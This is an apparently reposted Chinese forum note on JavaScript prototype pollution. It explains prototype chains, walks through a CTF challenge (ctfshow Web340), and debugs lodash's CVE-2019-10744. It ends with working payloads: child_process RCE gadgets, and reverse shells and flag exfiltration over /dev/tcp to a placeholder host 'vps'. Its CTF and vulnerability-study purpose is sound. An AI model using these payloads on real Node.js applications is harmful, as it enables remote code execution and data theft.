ToB企服应用市场:ToB评测及商务社交产业平台

标题: JavaScript原型链污染学习记录 [打印本页]

作者: 冬雨财经    时间: 2023-5-5 19:54
标题: JavaScript原型链污染学习记录
1.JS原型和继承机制

0> 原型及其搜索机制

我们创建的每个函数都有一个 prototype(原型)属性,这个属性是一个指针,指向一个对象,
而这个对象的用途是包含可以由特定类型的所有实例共享的属性和方法
设计原型的初衷无非是对于每个实例对象,其拥有的共同属性没必要对每个对象实例再分配一片内存来存放这个属性。而可以上升到所有对象共享这个属性,而这个属性的实体在内存中也仅仅只有一份。
而原型机制恰好满足这种需求。
打个不太恰当的比喻,对于每个对象,都有其原型对象作为共享仓库,共享仓库中有属性和方法供生产每个对象实例时使用
1> 原型链和继承

原型链是在原型上实现继承的一种形式
举个例子:
  1. function Father(){
  2.    this.name = "father";
  3.    this.age = 66;
  4. }
  5. function Son(){
  6.    this.name = "son";
  7. }
  8. var father1 = new Father();
  9. Son.prototype = father1;
  10. var son1 = new Son();
  11. console.log(son1);
  12. console.log(son1.__proto__);
  13. console.log(son1.__proto__.__proto__);
  14. console.log(son1.__proto__.__proto__.__proto__);
  15. console.log(son1.__proto__.__proto__.__proto__.__proto__);
  16. /*
  17. Father { name: 'son' }
  18. Father { name: 'father', age: 66 }
  19. {}
  20. [Object: null prototype] {}      
  21. null
  22. */
复制代码
整个的原型继承链如下:

1)搜索当前实例属性
2)搜索当前实例的原型属性
3)迭代搜索直至null
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
在上面的例子中
  1. console.log(son1.name);
  2. console.log(son1.age);
  3. /*
  4. son
  5. 66
  6. */
复制代码
2> 内置对象的原型

这个也是多级原型链污染的基础
拿一张业内很经典的图来看看

2.姿势利用

1>利用原型污染进行RCE
  1. global.process.mainModule.constructor._load('child_process').execSync('calc')
复制代码
[img=720,275.7660167130919]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501153417183.png[/img]
2>多级污染

ctfshow Web340中有这么一题:
  1. /* login.js */
  2.  var user = new function(){
  3.    this.userinfo = new function(){
  4.    this.isVIP = false;
  5.    this.isAdmin = false;
  6.    this.isAuthor = false;    
  7.    };
  8.   }
  9.  utils.copy(user.userinfo,req.body);
  10.  if(user.userinfo.isAdmin){
  11.   res.end(flag);
  12.   }
复制代码
由于Function原型对象的原型也是Object的原型,即
user --(__proto__)--> Function.prototype --(__proto__)--> Object.prototype
那么就可以通过这个进行多级污染,payload为如下形式:
  1. {
  2.    "__proto__":{
  3.        "__proto__":{
  4.            attack_code
  5.        }
  6.    }
  7. }
复制代码
3>Lodash模块的原型链污染(以lodash.defaultsDeep(CVE-2019-10744)为例,进行CVE复现)

lodash版本 < 4.17.12
CVE-2019-10744:在低版本中的lodash.defaultDeep函数中,Object对象可以被原型链污染,从而可以配合其他漏洞。
看下官方样例PoC的调试过程:
  1. const lodash = require('lodash');
  2. const payload = '{"constructor": {"prototype": {"whoami": "hack"}}}'
  3. function check() {
  4.    lodash.defaultsDeep({}, JSON.parse(payload));
  5.    if (({})['whoami'] === "hack") {
  6.        console.log(`Vulnerable to Prototype Pollution via ${payload}`);
  7.        console.log(Object.prototype);
  8.    }
  9. }
  10. check();
复制代码
开始调试:
  1. 在lodash中,baseRest是一个辅助函数,用于帮助创建一个接受可变数量参数的函数。
复制代码
所以主体逻辑为,而这段匿名函数也将为func的函数的函数体
  1. args.push(undefined, customDefaultsMerge);
  2. return apply(mergeWith, undefined, args);
复制代码

查看overRest
在变量监听中可以发现,传入的参数整合成一个参数对象args
[img=720,416.10702341137124]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501165542755.png[/img]
继续往下return apply
[img=720,180.23715415019763]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501200948397.png[/img]
到apply后进入,是个使用switch并且根据参数个数作为依据
发现使用了call,这里可能是个进行原型链继承的可利用点。
(而这种技术称为借用构造函数,其思想就是通过子类构造函数中调用超类构造函数完成原型链继承)
  1. function Super(){}
  2. function Sub(){
  3.    Super.call(this);           // 继承
  4. }
复制代码
然后apply中返回至刚才的匿名函数体中(此时刚执行完baseRest(func)),其中customDefaultMerge为merge的声明方式
[img=720,311.219]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501201429867.png[/img]
继续深入,由上可知apply(func=mergeWith,thisArg=undefined,args=Array[4])
[img=720,150.26481715006304]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501202011773.png[/img]
基于start的计算机制,不难得知undefined是作为占位符,使得start向后移动
[img=720,236.20143884892087]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501203050752.png[/img]
继续调试,在NodeJS中,普通函数中调用this等同于调用全局对象global
[img=720,47.56476683937824]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501203715075.png[/img]
将assigner视为合并的一个黑盒函数即可,至此完成原型链污染。
[img=720,75.69573283858998]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501204240350.png[/img]
[img=720,262.72100313479626]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501204336670.png[/img]
Question: 注意到PoC中的lodash.defaultsDeep({}, JSON.parse(payload));是要求先传入一个object实例的(此处为{})
所以还是具体分析一下合并的过程(来看下assigner的一些底层实现)
注意:通常而言,合并需要考虑深浅拷贝的问题
  1. /*baseMerge*/
  2.    function baseMerge(object, source, srcIndex, customizer, stack) {
  3.      if (object === source) {                  // 优化判断是否为同一对象,是则直接返回
  4.        return;
  5.      }
  6.        
  7.        // 遍历source的属性,选择深浅复制
  8.        
  9.      baseFor(source, function(srcValue, key) {
  10.        if (isObject(srcValue)) {
  11.          stack || (stack = new Stack);
  12.          baseMergeDeep(object, source, key, srcIndex, baseMerge, customizer, stack);
  13.        }
  14.        else {
  15.          var newValue = customizer
  16.            ? customizer(safeGet(object, key), srcValue, (key + ''), object, source, stack)
  17.            : undefined;
  18.          if (newValue === undefined) {
  19.            newValue = srcValue;
  20.          }
  21.          assignMergeValue(object, key, newValue);
  22.        }
  23.      }, keysIn);
  24.    }
复制代码
  1.    var baseFor = createBaseFor();
复制代码
  1.    function createBaseFor(fromRight) {         // fromRight选择从哪端开始遍历      
  2.      return function(object, iteratee, keysFunc) {
  3.        var index = -1,
  4.            iterable = Object(object),
  5.            props = keysFunc(object),
  6.            length = props.length;
  7.        while (length--) {
  8.          var key = props[fromRight ? length : ++index];
  9.          if (iteratee(iterable[key], key, iterable) === false) {   // 这里的iteratee即为baseFor中的匿名函数
  10.            break;
  11.          }
  12.        }
  13.        return object;
  14.      };
  15.    }
复制代码
那我就再调试一下,在iteratee中(即匿名函数中),若为对象,则选择深拷贝。
[img=720,629.7852028639618]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501214414062.png[/img]
原来在4.17.12之前的版本也是有waf的,只是比较弱。

回归正题,在customizer之后便产生了合并
[img=720,680.1413427561837]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501215807038.png[/img]
所以,为了更好地观察,我将{}替换成[](Array对象实例)
重新开始调试到此处并进入,发现这是一个迭代合并的过程,先判断是否都为对象。如果是的话,则会进行压栈然后开始浅拷贝合并。
[img=720,148.7603305785124]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501220535024.png[/img]
[img=720,134.62437395659433]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501222217997.png[/img]
这是在生成属性时需要设置的四种数据属性

回归正题,发现只能写入Array的原型
[img=720,490.96774193548384]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501221644127.png[/img]
再验证一下
  1. const lodash = require('lodash');
  2. const payload = '{"constructor": {"prototype": {"whoami": "hack"}}}'
  3. var object = new Object();
  4. function check() {
  5.    // JSON.parse(payload)之后是一个JS对象
  6.    lodash.defaultsDeep([],JSON.parse(payload));
  7.    if (({})['whoami'] === "hack") {
  8.        console.log(`Vulnerable to Prototype Pollution via ${payload}`);
  9.        console.log(Object.prototype);
  10.    }
  11. }
  12. check();
  13. console.log(Array.prototype);
复制代码
[img=720,337.0013037809648]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501221752843.png[/img]
所以说需要直接传入一个Object的实例。
官方修复,直接上waf:检测JSON中的payload中的key值
此处对比一下lodash4.17.12之前的版本,key值过滤得更为严格
[img=720,285.9734167318217]https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/image-20230501210253505.png[/img]
总结一下,CVE-2019-10744可用的payload
  1. # 反弹shell
  2. {"constructor":{"prototype":
  3. {"outputFunctionName":"a=1;process.mainModule.require('child_process').exec('bash -c "echo $FLAG>/dev/tcp/vps/port "')//"}}}
  4. # RCE
  5. // 对于某个object实例
  6. {"__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag')//"}}
  7. # 反弹shell
  8. {"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/vps/port 0>&1"');var __tmp2"}}
复制代码
更多网安技能的在线实操练习,请点击这里>>

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4